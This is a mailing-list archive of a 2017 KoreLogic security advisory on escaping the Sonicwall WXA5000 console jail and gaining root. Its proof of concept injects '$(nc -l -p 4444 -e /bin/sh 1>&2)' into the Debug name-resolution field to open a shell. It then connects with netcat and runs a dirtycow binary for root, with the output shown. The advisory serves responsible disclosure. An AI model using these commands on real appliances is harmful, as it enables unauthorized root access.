lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 24 Oct 2017 15:55:25 -0500
From: KoreLogic Disclosures <disclosures@...elogic.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] KL-001-2017-019 : Sonicwall WXA5000 Console Jail Escape and
 Privilege Escalation

KL-001-2017-019 : Sonicwall WXA5000 Console Jail Escape and Privilege Escalation

Title: Sonicwall WXA5000 Console Jail Escape and Privilege Escalation
Advisory ID: KL-001-2017-019
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-019.txt


1. Vulnerability Details

     Affected Vendor: Sonicwall
     Affected Product: WXA5000 WAN Optimization Appliance
     Affected Version: 1.3.2-10-30
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special Elements
                         used in an OS Command
     Impact: Root Access
     Attack vector: Console

2. Vulnerability Description

     The console menu for this appliance can be escaped
     into a regular sh shell by using encapsulated $() shell
     commands. Privileges can be escalated to root by using the
     dirtyc0w exploit.

3. Technical Description

	????????????????SonicWALL WAN Optimization Configuration?????????????????
	? Show Network Settings                                                 ?
	? Renew DHCP lease                                                      ?
	? Show Serial Number                                                    ?
	? Show Firmware Version                                                 ?
	? Factory Reset - Restore the device to factory installed state.        ?
	? Secure Factory Reset - Securely erase hard disk and do Factory Reset. ?
	? Upgrade Firmware - Upgrade Firmware via USB stick.                    ?
	? ------------------                                                    ?
	? Debug                                                                 ?
	? Help                                                                  ?
	? ------------------                                                    ?
	? Reboot                                                                ?
	? Shutdown                                                              ?
	?????????????????????????????????????????????????????????????????????????

     Selecting 'Debug' provides a basic diagnostic menu allowing
     the user to ping the gateway, show system load, or resolve a
     domain name.

     Use the following string during name resolution:

        $(nc -l -p 4444 -e /bin/sh 1>&2)

     Next, connect to the shell using netcat.

	$ nc -v 1.3.3.7 4444
	Connection to 1.3.3.7 4444 port [tcp/krb524] succeeded!
	id;uname -a
	uid=1017(wxauser) gid=1017 groups=1017
	Linux WXA5000-9A067AC 3.10.15 #1 SMP Thu Jan 12 07:31:33 PST 2017 x86_64 GNU/Linux

    This kernel version is vulnerable to the dirtycow exploit.

	/tmp/cowroot
	uname -a;id
	Linux WXA5000-9A067AC 3.10.15 #1 SMP Thu Jan 12 07:31:33 PST 2017 x86_64 GNU/Linux
	uid=0(root) gid=1017 groups=0(root),1017

4. Mitigation and Remediation Recommendation

     There is no known remediation for this vulnerability from the vendor. Administrators should heavily restrict access
to any account of any privilege which can use the Debug functionality of the CLI.

     Network access to management interfaces should be properly segmented.

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2017.07.21 - KoreLogic requests security contact and PGP key from
                  Sonicwall using the vulnerability submission form at
                  https://mysonicwall.com/report/ProdVul.aspx.
     2017.07.24 - KoreLogic requests security contact and PGP key from
                  Sonicwall using security@...icwall.com email address.
     2017.08.09 - KoreLogic submits vulnerability information to Sonicwall
                  using https://mysonicwall.com/report/ProdVul.aspx.
                  Vulnerability submission ID 10762.
     2017.08.16 - 5 business days have elapsed since the vulnerability
                  was reported. No response from Sonicwall.
     2017.09.21 - 30 business days have elapsed since the vulnerability
                  was reported.
     2017.10.13 - 45 business days have elapsed since the vulnerability
                  was reported to Sonicwall.
     2017.10.19 - KoreLogic requests update from security@...icwall.com.
     2017.10.24 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt


Download attachment "signature.asc" of type "application/pgp-signature" (526 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ